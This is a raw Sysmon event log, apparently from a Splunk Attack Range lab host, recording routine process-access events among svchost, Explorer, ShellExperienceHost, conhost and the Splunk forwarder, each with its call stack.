21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128731Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128730Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128729Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128728Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128727Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128726Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128725Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128724Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128723Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128722Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128721Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128720Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128719Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128718Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128717Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128716Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128715Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128714Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128713Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128712Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128711Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128710Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128709Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128708Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128707Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128706Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2200-00000000C801}1160C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128705Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.471{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2200-00000000C801}1160C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035128704Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.424{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7B7C72641ACFAE197E2F08BEFED5837,SHA256=FE7788164B7C42EF8E3B1939E8E0A5D1D09FA1E0EFA1414AF694BF3B87BE43AD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128703Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.390{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-83CC-613A-E396-03000000C801}3324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128702Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.388{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128701Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:40.388{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128700Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 